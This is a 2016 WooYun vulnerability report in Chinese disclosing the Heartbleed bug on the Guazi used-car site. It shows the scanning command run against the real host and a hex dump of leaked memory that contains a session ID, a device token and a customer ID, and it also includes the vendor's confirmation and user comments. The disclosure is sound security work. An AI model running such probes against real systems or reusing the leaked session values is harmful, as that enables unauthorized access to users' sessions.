瓜子二手车主站心脏滴血漏洞

编号219549
Urlhttp://www.wooyun.org/bug.php?action=view&id=219549
漏洞状态厂商已经修复
漏洞标题瓜子二手车主站心脏滴血漏洞
漏洞类型系统/服务运维配置不当
厂商瓜子二手车直卖网
白帽子路人甲
提交日期2016-06-15 17:08:00
公开日期2016-07-01 15:47:00
修复时间2016-07-01 15:47:00
确认时间2016-06-16 00:00:00
Confirm Spend1
漏洞标签敏感信息泄露
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank2
漏洞简介
RT
漏洞细节

python ssltest.py www.guazi.com  443


泄露session信息。

ending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 3891
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 42 41 04 7E 39 4F BD DD E6 33 2D 25 90 [email protected]~9O...3-%.
0010: 9E 6F 6F AD 29 CC EE 75 E5 7B 6B 9A 50 8B 05 C5 .oo.)..u.{k.P...
0020: 1F 82 1D C5 CD 23 EE DB D6 76 3E 15 93 18 68 6C .....#...v>...hl
0030: 55 28 34 AA 5D 75 CB 54 89 4F 40 CE 0C B1 C3 86 U(4.][email protected]
0040: 6E 48 1C B6 15 DF 14 03 01 00 01 01 16 03 01 00 nH..............
0050: 30 14 00 00 0C 19 B0 7F 04 F9 D8 CE A0 52 1C 5D 0............R.]
0060: C8 CD B7 16 82 E7 CC 88 DC F7 06 45 99 31 B3 04 ...........E.1..
0070: FA 18 AC D9 FD 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ................
0080: 0B 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 63 72 65 65 ....#.......cree
00e0: 6E 57 48 3D 31 34 34 30 58 32 35 36 30 26 64 65 nWH=1440X2560&de
00f0: 76 69 63 65 54 6F 6B 65 6E 3D 72 70 37 6C 6F 42 viceToken=rp7loB
0100: 51 6A 32 25 32 46 5A 4E 66 57 69 58 50 6A 32 47 Qj2%2FZNfWiXPj2G
0110: 75 56 4B 47 6C 45 35 70 6C 4C 76 78 50 33 30 33 uVKGlE5plLvxP303
0120: 7A 7A 4D 63 4D 37 6B 25 33 44 26 63 75 73 74 6F zzMcM7k%3D&custo
0130: 6D 65 72 49 64 3D 38 37 39 26 70 61 67 65 3D 31 merId=879&page=1
0140: 26 6D 6F 64 65 6C 3D 53 4D 2D 47 39 32 38 30 20 &model=SM-G9280
0150: 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 HTTP/1.1..Host:
0160: 61 70 69 2E 67 75 61 7A 69 2E 63 6F 6D 0D 0A 43 api.guazi.com..C

03b0: C8 1E 5F 8E 3D 76 BA 71 7E A8 22 74 89 06 8E 1B  .._.=v.q~."t....
03c0: 77 5B CE 3C 1C 9F 7B 04 AE 86 4D 01 DE 8E 79 F7 w[.<..{...M...y.
03d0: 86 84 17 37 23 F0 BF E6 AB 02 66 00 C2 5D A8 1A ...7#.....f..]..
03e0: 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F ................
03f0: 1A 04 EA 0A 86 82 95 4F DD 68 74 F9 50 C8 34 0F .......O.ht.P.4.
0400: 4B 42 5C B0 C1 D1 F5 B5 AF 41 92 61 65 74 61 3D KB\......A.aeta=
0410: 32 2E 30 3B 20 73 65 73 73 69 6F 6E 69 64 3D 66 2.0; sessionid=f
0420: 66 33 35 62 62 35 34 2D 62 37 62 35 2D 34 38 62 f35bb54-b7b5-48b
0430: 35 2D 66 30 62 31 2D 64 63 64 37 63 61 34 32 30 5-f0b1-dcd7ca420
0440: 63 66 62 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A cfb..Connection:
0450: 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 41 63 63 keep-alive..Acc
0460: 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 ept-Language: zh
0470: 2D 48 61 6E 73 3B 71 3D 31 2C 20 65 6E 3B 71 3D -Hans;q=1, en;q=
0480: 30 2E 39 2C 20 66 72 3B 71 3D 30 2E 38 2C 20 64 0.9, fr;q=0.8, d
0490: 65 3B 71 3D 30 2E 37 2C 20 6A 61 3B 71 3D 30 2E e;q=0.7, ja;q=0.
04a0: 36 2C 20 6E 6C 3B 71 3D 30 2E 35 0D 0A 55 73 65 6, nl;q=0.5..Use
04b0: 72 2D 41 67 65 6E 74 3A 20 47 4A 45 72 43 61 72 r-Agent: GJErCar
04c0: 41 70 70 2F 32 2E 30 2E 30 20 28 69 50 68 6F 6E App/2.0.0 (iPhon
04d0: 65 3B 20 69 4F 53 20 37 2E 31 2E 31 3B 20 53 63 e; iOS 7.1.1; Sc
04e0: 61 6C 65 2F 32 2E 30 30 29 0D 0A 0D 0A 9C 17 1B ale/2.00).......
04f0: 6F 3E F9 EE 54 58 E5 87 50 50 C5 EC A4 5A F9 7F o>..TX..PP...Z..

POC

瓜子2.png

瓜子1.png

修复方案

更新SSL模块

状态信息 2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已经确认,细节仅向厂商公开
2016-06-26: 细节向核心白帽子及相关领域专家公开
2016-07-01: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复确实有部分机器有这个问题,感谢投递!
回应信息危害等级:低漏洞Rank:2 确认时间:2016-06-16 11:40
Showing 1-4 of 4 items.
评论内容评论人点赞数评论时间

不过这样也好,估计上次厂商没看到,这下应该会好好修了

大物期末不能挂02016-06-16 15:28:00

当时看所有的域名几乎都有心血漏洞,没敢写清楚。。。。。

大物期末不能挂02016-06-16 15:25:00

@大物期末不能挂 我提之前翻了一下标题没看到有心脏滴血的漏洞,就提交了。

专业种田02016-06-16 13:31:00

WooYun: 瓜子二手车直卖网运维不当导致信息泄露

大物期末不能挂02016-06-16 12:11:00